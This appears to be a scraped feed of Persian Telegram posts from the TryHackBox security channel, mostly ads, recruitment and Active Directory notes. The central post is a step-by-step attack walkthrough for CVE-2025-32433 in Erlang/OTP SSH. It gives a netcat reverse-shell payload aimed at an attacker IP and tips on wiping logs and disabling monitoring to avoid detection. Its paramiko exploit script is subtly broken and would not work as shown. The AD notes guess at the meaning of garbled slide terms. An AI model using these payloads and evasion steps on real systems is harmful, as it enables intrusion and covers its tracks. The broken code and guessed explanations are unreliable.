Try Hack Box

📚 کتابچه "Mimikatz: تسلط عملی بر تکنیک‌های پیشرفته حملات Active Directory" از مقدماتی تا پیشرفته. اگر در حوزه امنیت سایبری و تست نفوذ Active Directory فعالیت میکنید، این کتابچه ضروریترین منبعی است که میتوانید داشته باشید! منبعی کامل برای تیم‌های قرمز (Red Team)، شامل دستورات عملی، اسکریپت‌های آماده، و تکنیک‌های evasion است که مستقیماً در تست‌های نفوذ استفاده میشوند. همین حالا این کتاب تخصصی را به زبان فارسی بخوانید. 🔥 عرضه ویژه اولین فروش:  💰 قیمت اصلی: ۲۵۰,۰۰۰ تومان  💥 با ۴۰٪ تخفیف: فقط ۱۵۰,۰۰۰ تومان  ⚠️ مهلت تخفیف: تنها ۵ روز دیگر!  📌 جهت خرید و کسب اطلاعات بیشتر، به ایدی زیر پیام دهید: @THBxSupport

کانالهای ما در تلگرام : @TryHackBox @TryHackBoxOfficial @TryHackBoxStory @RadioZeroPod

درود دوستان کسی میتونه یک لوگومشن بسازه برای دوره ها ؟ به ما پیام بده : @THBxSupport

نتیجه‌گیری آسیب‌پذیری CVE-2025-32433 به دلیل سادگی بهره‌برداری و تأثیرات بالقوه‌اش، تهدیدی جدی برای سیستم‌هایی است که از Erlang/OTP استفاده می‌کنند. مهاجمان می‌توانند از این آسیب‌پذیری برای دسترسی کامل به سیستم‌ها و انجام حملات مختلف استفاده کنند. بنابراین، به‌روزرسانی نرم‌افزارها و اجرای تدابیر امنیتی ضروری است. ⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شده‌اند و هرگونه استفاده غیرقانونی از آنها ممنوع است. #cve @TryHackBox

### نتیجه‌گیری آسیب‌پذیری CVE-2025-32433 به دلیل سادگی بهره‌برداری و تأثیرات بالقوه‌اش، تهدیدی جدی برای سیستم‌هایی است که از Erlang/OTP استفاده می‌کنند. مهاجمان می‌توانند از این آسیب‌پذیری برای دسترسی کامل به سیستم‌ها و انجام حملات مختلف استفاده کنند. بنابراین، به‌روزرسانی نرم‌افزارها و اجرای تدابیر امنیتی ضروری است. ⚠️ هشدار: این اطلاعات فقط برای مقاصد آموزشی ارائه شده‌اند و هرگونه استفاده غیرقانونی از آنها ممنوع است. #cve @TryHackBox

برای توضیح نحوه بهره‌برداری از آسیب‌پذیری CVE-2025-32433 در Erlang/OTP و پیاده‌سازی حمله، باید ابتدا به جزئیات فنی آسیب‌پذیری و مکانیزم آن توجه کرد. این آسیب‌پذیری مربوط به پردازش نادرست پیام‌های پروتکل SSH است که می‌تواند منجر به اجرای کد از راه دور (RCE) شود. در ادامه، مراحل کلی بهره‌برداری از این آسیب‌پذیری و دستورات مرتبط را بررسی می‌کنیم. 1. شناخت محیط تارگت قبل از هر چیز، مهاجم باید یک سیستم آسیب‌پذیر را شناسایی کند. این سیستم‌ها معمولاً شامل دستگاه‌هایی هستند که از Erlang/OTP با نسخه‌های مستعد آسیب‌پذیری استفاده می‌کنند. مثال‌هایی از این دستگاه‌ها عبارتند از: - Cisco NSO و ConfD - دستگاه‌های OT/IoT - سیستم‌های مدیریت شبکه 2. شناسایی سرویس SSH قابل دسترس مهاجم باید سرویس SSH روی سیستم تارگت را شناسایی کند. این کار معمولاً با استفاده از ابزارهایی مانند nmap انجام می‌شود. دستور زیر می‌تواند برای اسکن پورت‌های باز و شناسایی خدمات SSH استفاده شود:

nmap -p 22 <IP_target> --script ssh2-enum-algos

این دستور پورت 22 (معمولاً پورت پیش‌فرض SSH) را اسکن کرده و الگوریتم‌های SSH پشتیبانی‌شده توسط سیستم تارگت را شناسایی می‌کند. 3. تهیه ابزار بهره‌برداری (Exploit Script) با توجه به اینکه PoC (Proof of Concept) برای این آسیب‌پذیری در دسترس عموم قرار گرفته است، مهاجم می‌تواند از این اسکریپت‌ها استفاده کند. این ابزارها معمولاً به صورت اسکریپت‌های Python یا C نوشته می‌شوند. مثالی از یک اسکریپت بهره‌برداری (فرضی):

import paramiko
import sys

def exploit(ip, port, payload):
    try:
        # ایجاد اتصال SSH
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        
        # ارسال پیام خاصی که آسیب‌پذیری را فعال می‌کند
        transport = paramiko.Transport((ip, port))
        transport.start_client()
        
        # ارسال پیلود مخرب
        transport._send_message(payload)
        print("[+] Exploit Sent!")
        
        # اجرا و دسترسی به سیستم
        stdin, stdout, stderr = client.exec_command("id")
        print(stdout.read().decode())
        
    except Exception as e:
        print(f"[-] Failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <IP> <Port> <Payload>")
        sys.exit(1)
    
    ip = sys.argv[1]
    port = int(sys.argv[2])
    payload = sys.argv[3]
    
    exploit(ip, port, payload)

4. اجرای حمله مهاجم می‌تواند از طریق اجرای اسکریپت فوق، حمله را شروع کند. مراحل کلی به شرح زیر است: الف) آماده‌سازی پیلود مهاجم باید یک پیلود مخرب تهیه کند که می‌تواند شامل دستورات سیستمی برای اجرای کد از راه دور باشد. مثال:

/bin/bash -c "nc -e /bin/bash <IP_Attacker> <Port>"

این پیلود یک Reverse Shell ایجاد می‌کند که به مهاجم اجازه می‌دهد به سیستم تارگت دسترسی کامل پیدا کند. ب) اجرای اسکریپت مهاجم اسکریپت را با آدرس IP، پورت و پیلود مورد نظر اجرا می‌کند:

python3 exploit.py <IP_Target> "/bin/bash -c 'nc -e /bin/bash <IP_attacker> <Port>'"

5. دسترسی به سیستم تارگت اگر حمله موفق باشد، مهاجم می‌تواند از طریق اتصال Reverse Shell به سیستم تارگت دسترسی کامل پیدا کند. این دسترسی می‌تواند شامل انجام اعمال زیر باشد: - دستکاری فایل‌ها - دسترسی به داده‌های حساس - اجرای دستورات سیستمی - نصب بدافزار یا Backdoor 6. جلوگیری از تشخیص مهاجمان معمولاً تلاش می‌کنند ردپای خود را پاک کنند تا از تشخیص حمله جلوگیری کنند. این کار می‌تواند شامل موارد زیر باشد: - پاک کردن لاگ‌های سیستم (/var/log/) - غیرفعال کردن ابزارهای مانیتورینگ - تغییر تنظیمات فایروال یا SSH 7. تأثیرات حمله در صورت موفقیت، مهاجم می‌تواند: - کنترل کامل سیستم: دسترسی root یا مدیریتی به دستگاه تارگت. - حملات DoS: باعث ایجاد اختلال در عملکرد دستگاه شود. - دسترسی به داده‌های حساس: اطلاعات محرمانه را سرقت یا دستکاری کند. راهکارهای مقابله برای جلوگیری از بهره‌برداری از این آسیب‌پذیری، توصیه‌های زیر ارائه می‌شود: 1. به‌روزرسانی Erlang/OTP: نسخه‌های OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 را نصب کنید. 2. غیرفعال کردن SSH: اگر استفاده از SSH ضروری نیست، آن را غیرفعال کنید. 3. استفاده از فایروال: دسترسی به پورت SSH را محدود کنید. 4. نظارت بر لاگ‌ها: به دنبال فعالیت‌های مشکوک در لاگ‌های سیستم باشید. @TryHackBox

سیسکو تأیید می‌کند که برخی از محصولات آن تحت تأثیر آسیب‌پذیری بحرانی اجرای کد از راه دور در Erlang/OTP با شناسه CVE-2025-32433 قرار گرفته‌اند. این آسیب‌پذیری که توسط گروهی از محققان دانشگاه روهر در بوخوم (آلمان) کشف شده است، با شناسه CVE-2025-32433 ردیابی می‌شود و به عنوان مشکلی در پردازش پیام‌های پروتکل SSH شرح داده می‌شود که ممکن است به یک مهاجم غیرمجاز اجازه دهد به سیستم‌های آسیب‌پذیر دسترسی پیدا کرده و کد دلخواه اجرا کند. محققان هشدار دادند که بهره‌برداری از این آسیب‌پذیری می‌تواند منجر به تسلط کامل میزبان‌ها شود که به افراد ثالث اجازه می‌دهد به داده‌های حساس دسترسی غیرمجاز پیدا کرده و آنها را دستکاری کنند، و همچنین حملات نوع DoS انجام دهند. CVE-2025-32433 در نسخه‌های OTP-27.3.3، OTP-26.2.5.11 و OTP-25.3.2.20 اصلاح شده است. نسخه‌های قبلی تحت تأثیر قرار دارند. چندی پس از اینکه وجود این آسیب‌پذیری آشکار شد، جامعه متخصصان امنیت سایبری دریافتند که بهره‌برداری از CVE-2025-32433 بسیار ساده است و جزئیات فنی و اسکریپت‌های PoC ظرف ۲۴ ساعت عموماً در دسترس قرار گرفتند. محققان Qualys معتقدند که پس از کشف این خطا، بسیاری از دستگاه‌ها ممکن است در معرض حملات قرار بگیرند، با توجه به اینکه اکثر دستگاه‌های Cisco و Ericsson از Erlang استفاده می‌کنند. هر سرویسی که از کتابخانه SSH Erlang/OTP برای دسترسی از راه دور استفاده می‌کند، مانند آنچه در دستگاه‌های OT/IoT و دستگاه‌های محاسبات لبه استفاده می‌شود، در معرض خطر هک قرار دارد. Arctic Wolf نیز تأثیر بالقوه را تحلیل کرد و اشاره کرد که علاوه بر Ericsson و Cisco که Erlang را با چندین محصول خود مرتبط کرده‌اند، این نرم‌افزار توسط National Instruments، Broadcom، EMQ Technologies، Very Technology، Apache Software Foundation و Riak Technologies نیز استفاده می‌شود. با این حال، برای این شرکت‌ها معمولاً نصب جداگانه‌ای از Erlang/OTP مورد نیاز است. در همین حال، Cisco ادامه می‌دهد تا تأثیر CVE-2025-32433 را ارزیابی کند و گستره‌ای از محصولات مربوط به مسیریابی، سوئیچینگ، محاسبات یکپارچه، مدیریت شبکه و برنامه‌های شبکه را بررسی کند. در حال حاضر، شرکت به طور قطعی تأیید می‌کند که محصولات ConfD، Network Services Orchestrator (NSO)، Smart PHY، Intelligent Node Manager و Ultra Cloud Core تحت تأثیر قرار گرفته‌اند. غول شبکه‌ای اشاره کرد که اگرچه ConfD و NSO (که انتظار می‌رود در ماه مه اصلاح شوند) تحت تأثیر آسیب‌پذیری قرار دارند، به دلیل پیکربندی خود، آسیب‌پذیری اجرای کد از راه دور در آنها وجود ندارد. #cve @TryHackBox

تیم ترجمه ما قصد دارد یک کتاب را ترجمه کند با موضوع مهندسی اجتماعی و اوسینت حال پیشنهاد شما چه کتابی است ؟ کتابهای مورد نظر : 1. Social Engineering - The Art of Human Hacking 2. Unmasking Social Engineering - The Himan Element of Security 3. PRACTICAL SOCIAL ENGINEERING JOE GRAY 4. SEC467 5. کتاب مهندسی اجتماعی کوین میتینگ 6. کتابهای مایکل بازل پیشنهاد و نظرات خودتون در کامنت ها اعلام بفرمایید .

WinRMS Relaying @TryHackBox

بخش ساختار Active Directory: - معرفی معماری پایه‌ای Active Directory می‌پردازیم . مفاهیم کلیدی: - Forest (جنگل): بالاترین سطح منطقی در AD   - *کاربرد:* محدوده امنیتی مستقل که می‌تواند چندین دامنه را شامل شود - Domain (دامنه):   - *کاربرد:* واحد مدیریتی مستقل با سیاست‌های امنیتی خاص خود   - *مثال:* یک شرکت ممکن است دامنه‌های hr.company.com و it.company.com داشته باشد - Organizational Unit (OU):   - *کاربرد:* گروه‌بندی منطقی اشیا برای تفویض اختیارات   - *مثال:* OUهای "کارمندان"، "مدیران" و "سرویس‌ها" 3. دیاگرام جنگل و دامنه: Forest | Domain 1 | Domain 2 | |----|----| | QU    | QU    | | QU    | QU    | ---------- - نمایش گرافیکی ساده از یک جنگل با دو دامنه - علامت "QU" احتمالاً مخفف "Query Unit" یا صرفاً یک placeholder است - در واقعیت، هر دامنه شامل OUs، کاربران، کامپیوترها و سایر اشیا می‌شود

Active Directory - Components: - این قسمت به معرفی اجزای اصلی Active Directory (اکتیو دایرکتوری) می‌پردازد که یک سرویس دایرکتوری مایکروسافت برای شبکه‌های ویندوزی است. اجزای توضیح داده شده: الف) Schema: - معنی: Schema طرح کلی و ساختار پایگاه داده اکتیو دایرکتوری را تعریف می‌کند. - کاربرد: مشخص می‌کند چه نوع اشیایی (مانند کاربران، کامپیوترها، گروه‌ها) می‌توانند ایجاد شوند و چه ویژگی‌هایی دارند. ب) Query and index mechanism: - معنی: مکانیسم جستجو و ایندکس برای پیداکردن و انتشار اشیا و ویژگی‌های آنها. - کاربرد: به کاربران و برنامه‌ها اجازه می‌دهد به راحتی اشیا را در دایرکتوری جستجو کنند. ج) Global Catalog: - معنی: کاتالوگ جهانی که شامل اطلاعاتی درباره هر شیء در دایرکتوری است. - کاربرد: امکان جستجوی سریع در کل جنگل (forest) اکتیو دایرکتوری را فراهم می‌کند. د) Replication Service: - معنی: سرویس تکثیر که اطلاعات را بین کنترلرهای دامنه توزیع می‌کند. - کاربرد: اطمینان حاصل می‌کند که همه کنترلرهای دامنه اطلاعات یکسانی دارند. Attracting and Deleting Active Directory - Regiments Global Detecting - این بخش مربوط به تکنیک‌های حمله به اکتیو دایرکتوری می باشد (احتمالاً با اهداف مخرب). - Attracting and Deleting: ممکن است اشاره به روش‌های جذب توجه (مانند فیشینگ) و سپس حذف یا تخریب اکتیو دایرکتوری داشته باشد. - Global Detecting: احتمالاً اشاره به روش‌های شناسایی گسترده در شبکه دارد. کاوه @TryHackBox

دوستان اگر تجربه خوب و رزومه دارید میتونید در جهت تدریس دوره همکاری کنید به ما پیام بدید دوره هایی که در نظر داریم موارد زیر است : Linux : - Lpic1 , Lpic2 , Lpic3 Network : - MCSA/MCSE , CCNA , CCNP SECURITY : - SEC542 , SEC642 , SEC560 , SEC660 - PWK , EJPT , ( SANS , OFFSEC , ELEARN SECURITY , PENTESTER ACADEMY ) Pogramming : - Python , C/Cpp , ruby , js , php etc ... جهت ارتباط به ما پیام بدید : @KAVEH_APT

درود دوستان عزیز اگر از آموزش‌های ما استفاده می‌کنید و دوست دارید از تلاش ما حمایت کنید، می‌توانید از طریق لینک زیر کمک کوچکی به ما داشته باشید ❤:  https://daramet.com/TryHackBox راستش را بخواهید، من همیشه از درخواست دونیت راحت نبودم، اما شرایطی پیش آمده که مجبورم این را امتحان کنم. امیدوارم شما دوستان درک کنید.  ممنون که همراه ما هستید. 

دوستان دوره های رایگانمون هم ادامه خواهد داشت سرعت پایین برای این هست مدرس باید اسلاید هم درست کنه و روی کیفیت دوره وقت بزاره آیا اینجا کسی حاضر است اسلاید بسازه؟ به ما پیام بده : @Unique_exploitbot

دوستاناراده خیلی مهمه داشتن اراده قوی برای موفقیت ضروریه چون باید بتونید همیشه کاری که لازمه رو انجام بدید(چه خوشتون بیاد چه خوشتون نیاد) و قوی کردن این اراده سادس ولی راحت نیست اگر یک شخص نتونه کاری که باید رو وقتی که باید انجام بده... این مورد اراده تو زندگی شخصیتونم بدردتون میخوره بیاین مثال بزنم : اعتبارتون برای کسایی که میشناسن شما رو زیر سوال میره مهمتر از همه هدفی که داشتین برای رسیدن بهش از بین میره مثلا میخواستین بلوتیمر بشید یا هرچی . این پست کوتاهه ولی مهمه مهمه نه برای من برای خودت... و سخت امیدوارم که اهمیتش رو درک کنی برای قوی کردن اراده پیشنهادم بهت اینه که : هرکاری که میلت کشید انجام بدی رو انجام نده و هرکاری که حسشو نداشتی انجام بدی رو انجام بده مثلا از راه میرسی خونه و خسته ای و شدیدا دلت میخواد دراز بکشی و خستگی در کنی وقتی رسیدی خونه و خواستی اینکارو بکنی 3 دقیقه صبر کن بگو من 3 دقیقه صبر میکنم بعد دراز میکشم فکر کن داری با حس و حالت لج میکنی دقیقا کاری که اون میخواد رو انجام نمیدی خیلی تشنته میخوای آب بخوری بگو اول میرم دو خط کتاب میخونم بعد آب میخورم شاید خنده دار به نظر برسه شاید اینطوری بنظر برسه که داری با خودت لج میکنی ولی باید یادت باشه خودت حس و حالت نیستی خودت خودتی حس و حالت قرار نیست تو و کاراتو کنترل کنن اینکارو انجام بده و از آموزش هات لذت ببر حال ما میتونیم در این مسیر کنارتون باشیم با مشاوره یا کمک دیگه ای .

⭕ دوستان اگر برنامه ریزی دقیقی ندارید که چطوری دوره هایی که در رودمپ ها هست بگذرونید رو میتوانید برنامه ریزی را از ما دریافت کنید : ویژیگی های این برنامه ریزی : ✅ بررسی پیشرفت شما توسط ما ✅ برنامه‌ریزی حرفه‌ای متناسب با سطح شما + منابع مفید ✅ برنامه ریزی طبق زمان شما برای یادگیری ✅ مشاوره ✅ پشتیبانی فعال @TryHackBoxBot @THBxSupport

دوستان اگر تجربه خوب و رزومه دارید میتونید در جهت تدریس دوره همکاری کنید به ما پیام بدید دوره هایی که در نظر داریم موارد زیر است : Linux : - Lpic1 , Lpic2 , Lpic3 Network : - MCSA/MCSE , CCNA , CCNP , MIKROTIK SECURITY : - SEC542 , SEC642 , SEC560 , SEC660 - PWK , EJPT , ( SANS , OFFSEC , ELEARN SECURITY , PENTESTER ACADEMY ) Pogramming : - Python , C/Cpp , ruby , js , php etc ... جهت ارتباط با ما پیام بدید : @THBxSupport